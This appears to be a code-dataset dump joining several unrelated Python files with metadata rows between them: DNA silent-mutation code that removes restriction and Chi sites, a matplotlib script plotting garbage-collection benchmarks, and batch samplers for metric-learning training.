A = "MlyI: C"+str(k)+"G"
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
changes.append(A)
mlyInst = 0
mlyInst = outSeq.seq.find("GACTC")
if mlyInst > 0:
m = 1
j = mlyInst % 3
k = mlyInst + 1
if j == 0:
k = k + 2
A = "MlyI: C"+str(k)+"T"
outSeq.seq = outSeq.seq[:k-1]+"T"+outSeq.seq[k:]
elif j == 2:
k = k + 3
stK = str(outSeq.seq[k-6:k-4])
if stK == "AA":
A = "MlyI: G"+str(k-3)+"A"
outSeq.seq = outSeq.seq[:k-4]+"A"+outSeq.seq[k-3:]
elif stK == "GA":
A = "MlyI: G"+str(k-3)+"A"
outSeq.seq = outSeq.seq[:k-4]+"A"+outSeq.seq[k-3:]
elif stK == "GG":
A = "MlyI: G"+str(k-3)+"C"
outSeq.seq = outSeq.seq[:k-4]+"C"+outSeq.seq[k-3:]
elif stK == "AG":
A = "MlyI: G"+str(k-3)+"C"
outSeq.seq = outSeq.seq[:k-6]+"CGC"+outSeq.seq[k-3:]
elif stK == "CG":
A = "MlyI: CGG"+str(k-5)+"CGC"
outSeq.seq = outSeq.seq[:k-4]+"C"+outSeq.seq[k-3:]
else:
A = "MlyI: T"+str(k)+"G"
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
elif j == 1:
k = k + 4
stK = str(outSeq.seq[k-6])
if stK == "C" or stK == "A":
A = "MlyI: "+stK+"GA"+str(k-5)+"CGT"
outSeq.seq = outSeq.seq[:k-6]+"CGT"+outSeq.seq[k-3:]
changes.append(A)
A = "MlyI: C"+str(k)+"G"
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
changes.append(A)
mlyInst = 0
if 'GB' in stnds:
bsmInst = outSeq.seq.find("CGTCTC")
if bsmInst > 0:
m = 1
j = bsmInst % 3
k = bsmInst + 1
if j == 0:
k = k + 5
A = "BsmBI: C"+str(k)+"G"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
elif j == 2:
k = k + 3
stK = str(outSeq.seq[k-6:k-4])
if (stK == "CT" or stK == "CC" or stK == "GT" or stK == "GC"):
A = "BsmBI: C"+str(k-3)+"G"
outSeq.seq = outSeq.seq[:k-4]+"G"+outSeq.seq[k-3:]
else:
A = "BsmBI: C"+str(k)+"G"
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
changes.append(A)
elif j == 1:
k = k + 4
A = "BsmBI: TCT"+str(k)+"AGC"
changes.append(A)
outSeq.seq = outSeq.seq[:k-3]+"AGC"+outSeq.seq[k:]
bsmInst = 0
bsmInst = outSeq.seq.find("GCAGAG")
if bsmInst > 0:
m = 1
j = bsmInst % 3
k = bsmInst + 1
if j == 0:
k = k + 2
A = "BsmBI: G"+str(k)+"G"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
elif j == 2:
k = k + 3
stK = str(outSeq.seq[k-6:k-4])
stJ = str(outSeq.seq[k+2])
if (stJ == "A" or stJ == "G"):
A = "BsmBI: AG"+stJ+str(k+1)+"CGT"
outSeq.seq = outSeq.seq[:k]+"CGT"+outSeq.seq[k+3:]
elif (stJ == "T"):
A = "BsmBI: AGT"+str(k+1)+"TCT"
outSeq.seq = outSeq.seq[:k]+"TCT"+outSeq.seq[k+3:]
elif (stK == "TT" or stK == "TA" or stK == "AA" or stK == "GA"):
A = "BsmBI: G"+str(k-3)+"A"
outSeq.seq = outSeq.seq[:k-4]+"A"+outSeq.seq[k-3:]
elif (stK == "CG" or stK == "AC" or stK == "GC" or stK == "GG"):
A = "BsmBI: G"+str(k-3)+"C"
outSeq.seq = outSeq.seq[:k-4]+"C"+outSeq.seq[k-3:]
elif stK == "GT":
A = "BsmBI: G"+str(k-3)+"T"
outSeq.seq = outSeq.seq[:k-4]+"T"+outSeq.seq[k-3:]
elif stK == "TC":
A = "BsmBI: TCG"+str(k-5)+"AGC"
outSeq.seq = outSeq.seq[:k-6]+"AGC"+outSeq.seq[k-3:]
elif stK == "AG":
A = "BsmBI: AGG"+str(k-5)+"CGC"
outSeq.seq = outSeq.seq[:k-6]+"CGC"+outSeq.seq[k-3:]
else:
A = "BsmBI: G"+str(k)+"A"
outSeq.seq = outSeq.seq[:k-1]+"A"+outSeq.seq[k:]
changes.append(A)
elif j == 1:
k = k + 2
A = "BsmBI: AGA"+str(k)+"CGT"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"CGT"+outSeq.seq[k+2:]
bsmInst = 0
btgzInst = outSeq.seq.find("GCGATG")
if btgzInst > 0:
m = 1
j = btgzInst % 3
k = btgzInst + 1
if j == 0:
k = k + 2
A = "BtgZI: G"+str(k)+"C"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"C"+outSeq.seq[k:]
elif j == 2:
k = k + 3
stK = str(outSeq.seq[k-6:k-4])
if (stK == "AA" or stK == "GA"):
A = "BtgZI: G"+str(k-3)+"A"
outSeq.seq = outSeq.seq[:k-4]+"A"+outSeq.seq[k-3:]
changes.append(A)
elif (stK == "AG"):
A = "BtgZI: AGG"+str(k-5)+"CGC"
outSeq.seq = outSeq.seq[:k-6]+"CGC"+outSeq.seq[k-3:]
changes.append(A)
A = "BtgZI: A"+str(k)+"T"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"T"+outSeq.seq[k:]
elif j == 1:
k = k + 4
A = "BtgZI: C"+str(k-3)+"T"
changes.append(A)
outSeq.seq = outSeq.seq[:k-4]+"T"+outSeq.seq[k-3:]
btgzInst = 0
btgzInst = outSeq.seq.find("CATCGC")
if btgzInst > 0:
m = 1
j = btgzInst % 3
k = btgzInst + 1
if j == 0:
k = k + 2
A = "BtgZI: T"+str(k)+"C"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"C"+outSeq.seq[k:]
elif j == 2:
k = k + 3
stK = str(outSeq.seq[k-6:k-4])
if (stK == "CT" or stK == "CC" or stK == "GT" or stK == "GC"):
A = "BtgZI: C"+str(k-3)+"G"
outSeq.seq = outSeq.seq[:k-4]+"G"+outSeq.seq[k-3:]
else:
A = "BtgZI: C"+str(k)+"T"
outSeq.seq = outSeq.seq[:k-1]+"T"+outSeq.seq[k:]
changes.append(A)
elif j == 1:
k = k + 4
stK = str(outSeq.seq[k-6])
if stK == "C":
A = "BtgZI: A"+str(k-3)+"G"
outSeq.seq = outSeq.seq[:k-6]+"CCG"+outSeq.seq[k-3:]
changes.append(A)
A = "BtgZI: TCG"+str(k-2)+"AGC"
changes.append(A)
outSeq.seq = outSeq.seq[:k-3]+"AGC"+outSeq.seq[k:]
btgzInst = 0
if 'chi' in stnds:
chiInst = outSeq.seq.find("GCTGGTGG")
if chiInst > 0:
m = 1
j = chiInst % 3
k = chiInst + 1
if j == 0:
k = k + 2
A = "Chi site: T"+str(k)+"G"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
elif j == 2:
k = k + 3
stK = str(outSeq.seq[k-6:k-4])
if (stK == "TT" or stK == "TA" or stK == "AA" or stK == "GA"):
A = "Chi site: G"+str(k-3)+"A"
outSeq.seq = outSeq.seq[:k-4]+"A"+outSeq.seq[k-3:]
elif (stK == "CG" or stK == "AC" or stK == "GC" or stK == "GG"):
A = "Chi site: G"+str(k-3)+"C"
outSeq.seq = outSeq.seq[:k-4]+"C"+outSeq.seq[k-3:]
elif stK == "GT":
A = "Chi site: G"+str(k-3)+"T"
outSeq.seq = outSeq.seq[:k-4]+"T"+outSeq.seq[k-3:]
elif stK == "TC":
A = "Chi site: TCG"+str(k-5)+"AGC"
outSeq.seq = outSeq.seq[:k-6]+"AGC"+outSeq.seq[k-3:]
elif stK == "AG":
A = "Chi site: AGG"+str(k-5)+"CGC"
outSeq.seq = outSeq.seq[:k-6]+"CGC"+outSeq.seq[k-3:]
else:
A = "Chi site: G"+str(k+3)+"T"
outSeq.seq = outSeq.seq[:k+2]+"T"+outSeq.seq[k+3:]
changes.append(A)
elif j == 1:
k = k + 1
A = "Chi site: C"+str(k)+"T"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"T"+outSeq.seq[k:]
chiInst = 0
chiInst = outSeq.seq.find("CCACCAGC")
if chiInst > 0:
m = 1
j = chiInst % 3
k = chiInst + 1
if j == 0:
k = k + 2
A = "Chi site: A"+str(k)+"G"
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
elif j == 2:
k = k + 3
stK = str(outSeq.seq[k-6:k-4])
if (stK == "CT" or stK == "CC" or stK == "GT" or stK == "GC"):
A = "Chi site: C"+str(k-3)+"G"
outSeq.seq = outSeq.seq[:k-4]+"G"+outSeq.seq[k-3:]
else:
A = "Chi site: C"+str(k)+"T"
outSeq.seq = outSeq.seq[:k-1]+"T"+outSeq.seq[k:]
elif j == 1:
k = k + 4
stK = str(outSeq.seq[k-6])
if (stK == "C" or stK == "A" or stK == "G"):
A = "Chi site: C"+str(k-3)+"G"
outSeq.seq = outSeq.seq[:k-4]+"G"+outSeq.seq[k-3:]
else:
A = "Chi site: TCC"+str(k-3)+"AGC"
outSeq.seq = outSeq.seq[:k-6]+"AGC"+outSeq.seq[k-3:]
changes.append(A)
chiInst = 0
stpCdn = str(outSeq.seq[len(outSeq.seq)-3:len(outSeq.seq)])
if (stpCdn == 'TGA' or stpCdn == 'TAG'):
A = 'Stop Codon: '+str(outSeq.seq[len(outSeq.seq)-3:len(outSeq.seq)])+str(len(outSeq.seq)-3)+'TAA'
changes.append(A)
outSeq.seq=outSeq.seq[:len(outSeq.seq)-3]+'TAA'
if (stpCdn != 'TAA' and stpCdn != 'TAG' and stpCdn != 'TGA'):
print("Error: Go back, you need a stop codon - probably TAA")
sys.exit("Error: no stop codon")
if len(changes) > (len(outSeq.seq)/5):
m = 0
print("Error: Conflicting mutations")
for i in changes:
print(i)
print(recSeq.seq)
sys.exit("Error: Mutation limit exceded")
#
# Test the output Protein sequence vs. the input Protein Sequence
#
outProt=outSeq.seq.translate()
inProt=recSeq.seq.translate()
if str(outProt) != str(inProt):
print(recSeq.seq)
print(outSeq.seq)
print(inProt)
print(outProt)
print("Error in silent mutation")
sys.exit("Error in silent mutation")
return
| 31.97546 | 101 | 0.498945 | 5,555 | 31,272 | 2.808821 | 0.051485 | 0.3582 | 0.254438 | 0.208806 | 0.826828 | 0.796962 | 0.764725 | 0.754214 | 0.748638 | 0.746331 | 0 | 0.032907 | 0.26925 | 31,272 | 977 | 102 | 32.008188 | 0.649877 | 0.051324 | 0 | 0.756642 | 0 | 0 | 0.092298 | 0 | 0.001063 | 0 | 0 | 0 | 0 | 1 | 0.001063 | false | 0 | 0.006376 | 0 | 0.008502 | 0.009564 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
3a23eef4073826368e3cfb26b6ee937b38283b4b | 6,859 | py | Python | plot_functions.py | junjieqian/ARES | a6c67e9d3a829f00df7c3c17fe91a6ff95858ad2 | [
"MIT"
] | 3 | 2016-06-01T08:09:17.000Z | 2021-05-06T02:15:20.000Z | plot_functions.py | junjieqian/ARES | a6c67e9d3a829f00df7c3c17fe91a6ff95858ad2 | [
"MIT"
] | null | null | null | plot_functions.py | junjieqian/ARES | a6c67e9d3a829f00df7c3c17fe91a6ff95858ad2 | [
"MIT"
] | null | null | null | def plot3(gcdict_default, mutatordict_default, gcdict_fifo, mutatordict_fifo, gcdict_improved, mutatordict_improved):
namelist = []
j = -1
xlist = []
ylist_gc_default = [] # GC
ylist_mu_default = [] # mutator
ylist_gc_fifo = [] # GC
ylist_mu_fifo = [] # mutator
ylist_gc_improved = []
ylist_mu_improved = []
#namelist = ['lusearch', 'xalan', 'sunflow', 'h2', 'eclipse', 'jython']
namelist = ['lusearch', 'xalan', 'sunflow', 'h2', 'eclipse', 'jython', 'eclipse', 'pmd', \
'avrora', 'tomcat', 'compiler.sunflow', 'crypto.aes', 'scimark.fft.large', 'xml.validation', 'xml.transform']
for name in namelist:
j += 1
xlist.append('1\n' + name)
xlist.append(' ')
xlist.append(' ')
xlist.append('2')
xlist.append(' ')
xlist.append(' ')
xlist.append('4')
xlist.append(' ')
xlist.append(' ')
xlist.append('8')
xlist.append(' ')
xlist.append(' ')
xlist.append('16')
xlist.append(' ')
xlist.append(' ')
xlist.append('32')
xlist.append(' ')
xlist.append(' ')
xlist.append('48')
xlist.append(' ')
xlist.append(' ')
xlist.append(' ')
list1 = gcdict_default[name]
list2 = mutatordict_default[name]
list3 = gcdict_fifo[name]
list4 = mutatordict_fifo[name]
list5 = gcdict_improved[name]
list6 = mutatordict_improved[name]
base = list1[0] + list2[0]
for i in range(len(list1)):
ylist_gc_default.append(float(list1[i])/float(base))
ylist_mu_default.append(float(list2[i])/float(base))
ylist_gc_default.append(0.0)
ylist_mu_default.append(0.0)
ylist_gc_default.append(0.0)
ylist_mu_default.append(0.0)
ylist_gc_fifo.append(0.0)
ylist_mu_fifo.append(0.0)
ylist_gc_fifo.append(float(list3[i])/float(base))
ylist_mu_fifo.append(float(list4[i])/float(base))
ylist_gc_fifo.append(0.0)
ylist_mu_fifo.append(0.0)
ylist_gc_improved.append(0.0)
ylist_mu_improved.append(0.0)
ylist_gc_improved.append(0.0)
ylist_mu_improved.append(0.0)
ylist_gc_improved.append(float(list5[i])/float(base))
ylist_mu_improved.append(float(list6[i])/float(base))
ylist_gc_default.append(0.0)
ylist_mu_default.append(0.0)
ylist_gc_fifo.append(0.0)
ylist_mu_fifo.append(0.0)
del xlist[-1]
del ylist_gc_default[-1]
del ylist_mu_default[-1]
del ylist_mu_fifo[-1]
del ylist_gc_fifo[-1]
plt.figure(figsize=(20, 10))
plt.bar(range(len(ylist_mu_default)), ylist_mu_default, color="#5f9ea0", edgecolor="k", label="Existing Completion Time")
plt.bar(range(len(ylist_gc_default)), ylist_gc_default, bottom=ylist_mu_default, color='#0000ff', \
edgecolor="k", label="Existing Pause Time")
plt.bar(range(len(ylist_mu_fifo)), ylist_mu_fifo, color="#d3d3d3", edgecolor="k", label="FIFO Completion Time")
plt.bar(range(len(ylist_gc_fifo)), ylist_gc_fifo, bottom=ylist_mu_fifo, color='#696969', edgecolor="k", label="FIFO Pause Time")
plt.bar(range(len(ylist_mu_improved)), ylist_mu_improved, color="#d3d3d3", edgecolor="k", hatch='\\', label="Improved Completion Time")
plt.bar(range(len(ylist_gc_improved)), ylist_gc_improved, bottom=ylist_mu_improved, color='#696969', edgecolor="k", \
hatch='\\', label="Improved Pause Time")
plt.xticks(range(len(xlist)), xlist)
plt.xlim([0, len(xlist)])
plt.ylim([0, 2])
plt.legend(loc="upper center", ncol=3)
plt.xlabel("Benchmarks run with different processor cores number")
plt.ylabel("Fraction of GC and mutator in total")
plt.savefig("gcfraction.pdf", format='pdf', bbox_inches='tight')
plt.cla()
def plot4(gcdict_default, mutatordict_default, gcdict_fifo, mutatordict_fifo, gcdict_improved, mutatordict_improved):
# plot the 48 cores only
namelist = []
j = -1
xlist = []
ylist_gc_default = [] # GC
ylist_mu_default = [] # mutator
ylist_gc_fifo = [] # GC
ylist_mu_fifo = [] # mutator
ylist_gc_improved = []
ylist_mu_improved = []
#namelist = ['lusearch', 'xalan', 'sunflow', 'h2', 'eclipse', 'jython']
namelist = ['lusearch', 'xalan', 'sunflow', 'h2', 'eclipse', 'jython', 'eclipse', 'pmd', \
'avrora', 'tomcat', 'compiler.sunflow', 'crypto.aes', 'scimark.fft.large', 'xml.validation', 'xml.transform']
for name in namelist:
j += 1
xlist.append(name)
xlist.append(' ')
xlist.append(' ')
xlist.append(' ')
xlist.append(' ')
list1 = gcdict_default[name]
list2 = mutatordict_default[name]
list3 = gcdict_fifo[name]
list4 = mutatordict_fifo[name]
list5 = gcdict_improved[name]
list6 = mutatordict_improved[name]
base = list1[0] + list2[0]
for i in range(len(list1)-1, len(list1)):
ylist_gc_default.append(float(list1[i])/float(base))
ylist_mu_default.append(float(list2[i])/float(base))
ylist_gc_default.append(0.0)
ylist_mu_default.append(0.0)
ylist_gc_default.append(0.0)
ylist_mu_default.append(0.0)
ylist_gc_fifo.append(0.0)
ylist_mu_fifo.append(0.0)
ylist_gc_fifo.append(float(list3[i])/float(base))
ylist_mu_fifo.append(float(list4[i])/float(base))
ylist_gc_fifo.append(0.0)
ylist_mu_fifo.append(0.0)
ylist_gc_improved.append(0.0)
ylist_mu_improved.append(0.0)
ylist_gc_improved.append(0.0)
ylist_mu_improved.append(0.0)
ylist_gc_improved.append(float(list5[i])/float(base))
ylist_mu_improved.append(float(list6[i])/float(base))
ylist_gc_default.append(0.0)
ylist_mu_default.append(0.0)
ylist_gc_fifo.append(0.0)
ylist_mu_fifo.append(0.0)
del xlist[-1]
del ylist_gc_default[-1]
del ylist_mu_default[-1]
del ylist_mu_fifo[-1]
del ylist_gc_fifo[-1]
plt.figure(figsize=(20, 10))
plt.bar(range(len(ylist_mu_default)), ylist_mu_default, color="#5f9ea0", edgecolor="k", label="Existing Completion Time")
plt.bar(range(len(ylist_gc_default)), ylist_gc_default, bottom=ylist_mu_default, color='#0000ff', \
edgecolor="k", label="Existing Pause Time")
plt.bar(range(len(ylist_mu_fifo)), ylist_mu_fifo, color="#d3d3d3", edgecolor="k", label="FIFO Completion Time")
plt.bar(range(len(ylist_gc_fifo)), ylist_gc_fifo, bottom=ylist_mu_fifo, color='#696969', edgecolor="k", label="FIFO Pause Time")
plt.bar(range(len(ylist_mu_improved)), ylist_mu_improved, color="#d3d3d3", edgecolor="k", hatch='\\', label="Improved Completion Time")
plt.bar(range(len(ylist_gc_improved)), ylist_gc_improved, bottom=ylist_mu_improved, color='#696969', edgecolor="k", \
hatch='\\', label="Improved Pause Time")
plt.xticks(range(len(xlist)), xlist)
plt.xlim([0, len(xlist)])
plt.ylim([0, 2])
plt.legend(loc="upper center", ncol=3)
plt.xlabel("Benchmarks run with different processor cores number")
plt.ylabel("Fraction of GC and mutator in total")
plt.savefig("gcfraction.pdf", format='pdf', bbox_inches='tight')
plt.cla()
| 40.347059 | 137 | 0.679254 | 994 | 6,859 | 4.471831 | 0.11167 | 0.07874 | 0.057593 | 0.087739 | 0.989651 | 0.989651 | 0.952531 | 0.940832 | 0.940832 | 0.940832 | 0 | 0.034215 | 0.156291 | 6,859 | 169 | 138 | 40.585799 | 0.733886 | 0.030034 | 0 | 0.924528 | 0 | 0 | 0.131456 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.012579 | false | 0 | 0 | 0 | 0.012579 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3a34ef5eeb14cc0c454f5b6cf376e4843efc66d5 | 12,210 | py | Python | utils/datamanager.py | maestrojeong/Deep-Hash-Table-ICML18- | 0c7efa230f950d5a2cd1928ac9f5d99f4276d2b5 | [
"MIT"
] | 70 | 2018-06-03T04:19:13.000Z | 2021-11-08T10:40:46.000Z | utils/datamanager.py | maestrojeong/Deep-Hash-Table-ICML18- | 0c7efa230f950d5a2cd1928ac9f5d99f4276d2b5 | [
"MIT"
] | null | null | null | utils/datamanager.py | maestrojeong/Deep-Hash-Table-ICML18- | 0c7efa230f950d5a2cd1928ac9f5d99f4276d2b5 | [
"MIT"
] | 14 | 2018-06-03T16:34:55.000Z | 2020-09-09T17:02:30.000Z | import numpy as np
import random
class BasicDatamanager(object):
def __init__(self, image, label, nclass):
self.image = image
self.label = label
self.nclass = nclass
self.ndata = len(self.label)
self.fullidx = np.arange(self.ndata)
self.start = 0
self.end = 0
def print_shape(self):
print("Image shape : {}({})".format(self.image.shape, self.image.dtype))
print("Label shape : {}({})".format(self.label.shape, self.label.dtype))
def count_label(self):
counter = np.zeros(self.nclass)
for i in range(self.ndata):
counter[int(self.label)]+=1
return counter
def next_batch(self, batch_size):
'''
Args:
batch_size - int
return batch size numbers of pairs
Return :
image
label
'''
if self.start == 0 and self.end ==0:
np.random.shuffle(self.fullidx) # shuffle first
if self.end + batch_size > self.ndata:
self.start = self.end
self.end = (self.end + batch_size)%self.ndata
self.subidx = np.append(self.fullidx[self.start:self.ndata], self.fullidx[0:self.end])
self.start = 0
self.end = 0
else:
self.start = self.end
self.end += batch_size
self.subidx = self.fullidx[self.start:self.end]
return self.image[self.subidx], self.label[self.subidx].astype('int32')
class ContrastDatamanager(object):
def __init__(self, image, label, nclass):
'''
Args:
image -
label -
nclass - number of total classes
'''
self.image = image
self.label = label
self.nclass = nclass
self.ndata = len(self.label)
self.pos_label_idx_set = [[idx for idx in range(self.ndata) if self.label[idx]==class_idx] for class_idx in range(self.nclass)]
self.neg_label_idx_set = [[idx for idx in range(self.ndata) if self.label[idx]!=class_idx] for class_idx in range(self.nclass)]
self.fullidx = np.arange(self.ndata)
self.start = 0
self.end = 0
def print_shape(self):
print("Image shape : {}".format(self.image.shape))
print("Label shape : {}".format(self.label.shape))
def count_label(self):
counter = np.zeros(self.nclass)
for i in range(self.ndata):
counter[int(self.label)]+=1
return counter
def change_nsclass(self, value):
self.nsclass = value
def next_batch(self, batch_size):
'''
Make batch data which containes (batch_size/nsclass) data in nsclass
Args:
batch_size - int
return batch size numbers of pairs
Return:
image - batch_size image
image_pair - batch_size image
label - batch_size binary label
pos to be 1
neg to be 0
'''
if self.start==0 and self.end==0:
np.random.shuffle(self.fullidx) # shuffle first
npositive = batch_size//2
nnegative = batch_size-npositive
self.binary_label = np.append(np.ones(npositive), np.zeros(nnegative))
if self.end + batch_size > self.ndata:
self.start = self.end
self.end = (self.end + batch_size)%self.ndata
self.subidx = np.append(self.fullidx[self.start:self.ndata], self.fullidx[0:self.end])
self.start = 0
self.end = 0
else:
self.start = self.end
self.end += batch_size
self.subidx = self.fullidx[self.start:self.end]
self.subidx_pair = list()
for i in range(batch_size):
anc_label = self.label[self.subidx[i]]
if i < npositive:
while True:
pos_sample = random.sample(self.pos_label_idx_set[anc_label], 1)[0]
if pos_sample!=self.subidx[i]:
break
self.subidx_pair.append(pos_sample)
else:
self.subidx_pair.append(random.sample(self.neg_label_idx_set[anc_label], 1)[0])
self.subidx_pair = np.array(self.subidx_pair)
return self.image[self.subidx], self.image[self.subidx_pair], self.binary_label
class TripletDatamanager(object):
def __init__(self, image, label, nclass, nsclass=2):
'''
Args:
image -
label -
nclass - number of total classes
nsclass - When we select the batch, the number of classes it contain
'''
self.image = image
self.label = label
self.nclass = nclass
self.nsclass = nsclass
self.ndata = len(self.label)
# list with [self.nclass] each element = idx set of which label is cls_idx
# initialize
self.label_idx_set = list()
for cls_idx in range(self.nclass):
self.label_idx_set.append(list())
# append
for d_idx in range(self.ndata):
self.label_idx_set[self.label[d_idx]].append(d_idx)
# to numpy
for cls_idx in range(self.nclass):
self.label_idx_set[cls_idx] = np.array(self.label_idx_set[cls_idx])
self.valid_class_set = [cls_idx for cls_idx in range(self.nclass) if len(self.label_idx_set[cls_idx])>1]
self.ndata_idx = np.array([len(v) for v in self.label_idx_set])
self.fullidx = [np.arange(self.ndata_idx[cls_idx], dtype=np.int32) for cls_idx in range(self.nclass)]
self.start = np.zeros(self.nclass, dtype=np.int32)
self.end = np.zeros(self.nclass, dtype=np.int32)
def print_shape(self):
print("Image shape : {}".format(self.image.shape))
print("Label shape : {}".format(self.label.shape))
def count_label(self):
counter = np.zeros(self.nclass)
for i in range(self.ndata):
counter[int(self.label)]+=1
return counter
def change_nsclass(self, value):
self.nsclass = value
def next_batch(self, batch_size):
'''
Make batch data which containes (batch_size/nsclass) data in nsclass
Args:
batch_size - int
return batch size numbers of pairs
Return:
image - batch_size image
label - batch_size label
'''
assert batch_size%self.nsclass == 0, "Batchsize(%d) should be divided by nsclass(%d)"%(batch_size, self.nsclass)
batch_per_class = batch_size//self.nsclass
for index in self.valid_class_set:
if self.start[index] == 0 and self.end[index] ==0:
np.random.shuffle(self.fullidx[index]) # shuffle first
sclass = np.array(random.sample(self.valid_class_set, self.nsclass))
self.subidx = list()
for cls_idx in sclass:
if self.end[cls_idx] + batch_per_class > self.ndata_idx[cls_idx]:
self.start[cls_idx] = self.end[cls_idx]
self.end[cls_idx] = (self.end[cls_idx] + batch_per_class)%self.ndata_idx[cls_idx]
self.subidx.append(self.label_idx_set[cls_idx][
np.append(
self.fullidx[cls_idx][self.start[cls_idx]:self.ndata_idx[cls_idx]],\
self.fullidx[cls_idx][0:self.end[cls_idx]])])
self.start[cls_idx] = 0
self.end[cls_idx] = 0
else:
self.start[cls_idx] = self.end[cls_idx]
self.end[cls_idx] += batch_per_class
self.subidx.append(self.label_idx_set[cls_idx][self.fullidx[cls_idx][self.start[cls_idx]:self.end[cls_idx]]])
if self.end[cls_idx]==self.ndata_idx[cls_idx]:
self.start[cls_idx]=0
self.end[cls_idx]=0
self.subidx = np.concatenate(self.subidx, axis=0)
return self.image[self.subidx], self.label[self.subidx].astype('int32')
class NpairDatamanager(object):
def __init__(self, image, label, nclass, nsclass):
self.image = image
self.label = label
self.nclass = nclass
self.nsclass = nsclass
self.ndata = len(self.label)
# list with [self.nclass] each element = idx set of which label is cls_idx
# initialize
self.label_idx_set = list()
for cls_idx in range(self.nclass):
self.label_idx_set.append(list())
# append
for d_idx in range(self.ndata):
self.label_idx_set[self.label[d_idx]].append(d_idx)
# to numpy
for cls_idx in range(self.nclass):
self.label_idx_set[cls_idx] = np.array(self.label_idx_set[cls_idx])
self.valid_class_set = [cls_idx for cls_idx in range(self.nclass) if len(self.label_idx_set[cls_idx])>1]
self.ndata_idx = np.array([len(vlist) for vlist in self.label_idx_set])
self.fullidx = [np.arange(self.ndata_idx[index], dtype=np.int32) for index in range(self.nclass)]
self.start = np.zeros(self.nclass, dtype=np.int32)
self.end = np.zeros(self.nclass, dtype=np.int32)
def print_shape(self):
print("Image shape : {}".format(self.image.shape))
print("Label shape : {}".format(self.label.shape))
def count_label(self):
counter = np.zeros(self.nclass)
for i in range(self.ndata): counter[int(self.label)]+=1
return counter
def next_batch(self, batch_size):
'''
Args:
batch_size - int
return batch size numbers of pairs
Return :
anc_img
pos_img
anc_label - label of anc img
pos_label - label of pos img
anc_label and pos_label is idential just for checking
'''
assert batch_size%(2*self.nsclass) == 0, "Batchsize(%d) should be multiple of (2*nsclass)(=%d)"%(batch_size, 2*self.nsclass)
batch_per_class = batch_size//self.nsclass
for index in self.valid_class_set:
if self.start[index] == 0 and self.end[index] ==0:
np.random.shuffle(self.fullidx[index]) # shuffle first
sclass = np.array(random.sample(self.valid_class_set, self.nsclass))
self.subidx = list()
for cls_idx in sclass:
if self.end[cls_idx] + batch_per_class > self.ndata_idx[cls_idx]:
self.start[cls_idx] = self.end[cls_idx]
self.end[cls_idx] = (self.end[cls_idx] + batch_per_class)%self.ndata_idx[cls_idx]
self.subidx.append(self.label_idx_set[cls_idx][
np.append(
self.fullidx[cls_idx][self.start[cls_idx]:self.ndata_idx[cls_idx]],\
self.fullidx[cls_idx][0:self.end[cls_idx]])])
self.start[cls_idx] = 0
self.end[cls_idx] = 0
else:
self.start[cls_idx] = self.end[cls_idx]
self.end[cls_idx] += batch_per_class
self.subidx.append(self.label_idx_set[cls_idx][self.fullidx[cls_idx][self.start[cls_idx]:self.end[cls_idx]]])
if self.end[cls_idx]==self.ndata_idx[cls_idx]:
self.start[cls_idx]=0
self.end[cls_idx]=0
self.anc_subidx = np.concatenate([[v[idx] for idx in range(len(v)) if idx%2==0] for v in self.subidx], axis=0)
self.pos_subidx = np.concatenate([[v[idx] for idx in range(len(v)) if idx%2==1] for v in self.subidx], axis=0)
assert len(self.anc_subidx)==len(self.pos_subidx), "Both anc and pos have same length"
return self.image[self.anc_subidx],\
self.image[self.pos_subidx],\
self.label[self.anc_subidx].astype('int32'),\
self.label[self.pos_subidx].astype('int32')
DATAMANAGER_DICT = {
'basic' : BasicDatamanager,
'contrast' : ContrastDatamanager,
'triplet' : TripletDatamanager,
'npair' : NpairDatamanager
}
| 38.275862 | 135 | 0.576413 | 1,625 | 12,210 | 4.171077 | 0.076308 | 0.063736 | 0.050162 | 0.042195 | 0.829596 | 0.822219 | 0.811744 | 0.775598 | 0.750664 | 0.750664 | 0 | 0.008795 | 0.310893 | 12,210 | 318 | 136 | 38.396226 | 0.796767 | 0.106224 | 0 | 0.763547 | 0 | 0 | 0.029762 | 0 | 0 | 0 | 0 | 0 | 0.014778 | 1 | 0.08867 | false | 0 | 0.009852 | 0 | 0.157635 | 0.059113 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3a3ee8978e463aef2d119d96262593efd4dc4eb1 | 207,210 | py | Python | openbook_moderation/tests/views/moderated_object.py | TamaraAbells/okuna-api | f87d8e80d2f182c01dbce68155ded0078ee707e4 | [
"MIT"
] | 164 | 2019-07-29T17:59:06.000Z | 2022-03-19T21:36:01.000Z | openbook_moderation/tests/views/moderated_object.py | TamaraAbells/okuna-api | f87d8e80d2f182c01dbce68155ded0078ee707e4 | [
"MIT"
